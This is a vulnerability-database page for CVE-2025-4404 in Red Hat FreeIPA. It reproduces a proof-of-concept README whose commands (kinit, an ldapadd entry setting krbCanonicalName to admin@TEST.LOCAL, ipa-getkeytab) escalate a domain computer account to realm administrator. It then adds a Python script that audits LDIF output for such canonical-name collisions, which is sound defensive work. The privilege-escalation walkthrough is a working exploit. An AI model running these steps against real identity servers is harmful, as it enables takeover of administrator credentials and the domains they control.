Related vulnerability
Title: Red Hat FreeIPA security vulnerability (CVE-2025-4404)
Description: Red Hat FreeIPA is an integrated security information management solution from Red Hat, Inc. (USA). It mainly provides identity management, policy management and audit management (IPA) for Linux and Unix computer networks. Red Hat FreeIPA contains a security vulnerability caused by missing validation of the uniqueness of krbCanonicalName; it may allow an attacker to obtain REALM administrator credentials and perform administrative tasks.
Description
POC for CVE-2025-4404
Introduction
# CVE-2025-4404 POC
POC for CVE-2025-4404
If you have a domain computer account (host/pc1.test.local@test.local), you can add a service by default, and you can set both krbPrincipalName and krbCanonicalName on it. By default, the krbCanonicalName attribute is missing on the FreeIPA 4.12.4 administrator account. You can request a Kerberos ticket for the krbPrincipalName value, but the ticket will contain the krbCanonicalName value.
Let's go
1) First, we request a ticket on behalf of the computer account:
`$ kinit host/pc1.test.local@TEST.LOCAL -k -t /etc/krb5.keytab`
2) Add a service account to LDAP:
```
$ ldapadd -H ldap://dc1.test.local
dn: krbprincipalname=test/pc1.test.local@TEST.LOCAL,cn=services,cn=accounts,dc=test,dc=local
ipaKrbPrincipalAlias: test/pc1.test.local@TEST.LOCAL
krbPrincipalName: test/pc1.test.local@TEST.LOCAL
objectClass: ipaKrbPrincipal
objectClass: ipaObject
objectClass: ipaService
objectClass: krbPrincipal
objectClass: krbPrincipalAux
objectClass: top
krbCanonicalName: admin@TEST.LOCAL
managedBy: fqdn=pc1.test.local,cn=computers,cn=accounts,dc=test,dc=local
```
3) Request a keytab
```
$ ipa-getkeytab -p test/pc1.test.local@TEST.LOCAL -k ./test.keytab --mech=GSSAPI
$ kdestroy -A
```
4) Request a ticket
`$ kinit --no-request-pac -k -t ./test.keytab test/pc1.test.local@TEST.LOCAL`
PWN!!!
You can check the ticket with:
`ldapwhoami -H ldap://dc1.test.local`
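The steps above work because nothing stops a service entry from carrying a krbCanonicalName that already belongs to another account. The following audit script is an added example for this page, not part of the original PoC: it parses LDIF text (for instance the output of `ldapsearch -LLL` over `cn=accounts`) and reports every entry whose krbCanonicalName is not one of its own krbPrincipalName values or is owned by a different entry. The LDIF embedded in it is constructed sample data that mirrors the entry the PoC creates; the function names are this example's own.

```python
"""Audit FreeIPA LDAP entries for krbCanonicalName collisions (CVE-2025-4404).

Added example, not code from the original PoC. SAMPLE_LDIF is constructed
test data: an admin user without krbCanonicalName, a legitimate HTTP service,
and a rogue service whose krbCanonicalName points at the admin principal.
"""
from collections import defaultdict

SAMPLE_LDIF = """\
dn: uid=admin,cn=users,cn=accounts,dc=test,dc=local
krbPrincipalName: admin@TEST.LOCAL
objectClass: krbPrincipalAux

dn: krbprincipalname=HTTP/dc1.test.local@TEST.LOCAL,cn=services,cn=accounts,dc=test,dc=local
krbPrincipalName: HTTP/dc1.test.local@TEST.LOCAL
krbCanonicalName: HTTP/dc1.test.local@TEST.LOCAL
objectClass: ipaService

dn: krbprincipalname=test/pc1.test.local@TEST.LOCAL,cn=services,cn=accounts,dc=test,dc=local
krbPrincipalName: test/pc1.test.local@TEST.LOCAL
krbCanonicalName: admin@TEST.LOCAL
objectClass: ipaService
"""


def parse_ldif(text):
    """Parse simple LDIF into a list of (dn, {attr_lowercase: [values]}).

    Handles folded continuation lines (leading space) and comments; base64
    ('::') values are not decoded, which is fine for principal-name attributes.
    """
    logical = []
    for raw in text.splitlines():
        if raw.startswith(" ") and logical:
            logical[-1] += raw[1:]  # unfold a continuation line
        else:
            logical.append(raw)

    entries = []
    dn, attrs = None, defaultdict(list)
    for line in logical + [""]:  # trailing "" flushes the last entry
        if line == "":
            if dn is not None:
                entries.append((dn, dict(attrs)))
            dn, attrs = None, defaultdict(list)
            continue
        if line.startswith("#"):
            continue
        name, sep, value = line.partition(":")
        if not sep:
            continue
        name, value = name.strip().lower(), value.strip()
        if name == "dn":
            dn = value
        else:
            attrs[name].append(value)
    return entries


def find_canonical_collisions(entries):
    """Return findings for every krbCanonicalName that is foreign to its entry.

    A finding is raised when the canonical name is not among the entry's own
    krbPrincipalName values, or when another entry owns that principal name.
    """
    owners = defaultdict(set)  # principal name -> DNs that list it
    for dn, attrs in entries:
        for principal in attrs.get("krbprincipalname", []):
            owners[principal].add(dn)

    findings = []
    for dn, attrs in entries:
        own = attrs.get("krbprincipalname", [])
        for canonical in attrs.get("krbcanonicalname", []):
            others = sorted(owners.get(canonical, set()) - {dn})
            if others or canonical not in own:
                findings.append({"dn": dn, "canonical": canonical, "owners": others})
    return findings


def audit(ldif_text):
    """Convenience wrapper: parse and audit in one call."""
    return find_canonical_collisions(parse_ldif(ldif_text))


if __name__ == "__main__":
    for f in audit(SAMPLE_LDIF):
        print(f"SUSPICIOUS {f['dn']}: krbCanonicalName={f['canonical']} "
              f"also owned by {f['owners'] or 'nobody'}")
```

On a live directory, pipe the LDIF from an authenticated `ldapsearch -LLL -b cn=accounts,dc=test,dc=local krbPrincipalName krbCanonicalName` into `audit()`; any entry whose canonical name resolves to a different account is exactly the condition the PoC relies on and should be removed or corrected before tickets can be issued for it.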
File snapshot
[4.0K] /data/pocs/0890d3000cda49fc43ba21da0b6c5f709776b3ac
└── [1.4K] README.md
0 directories, 1 file
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.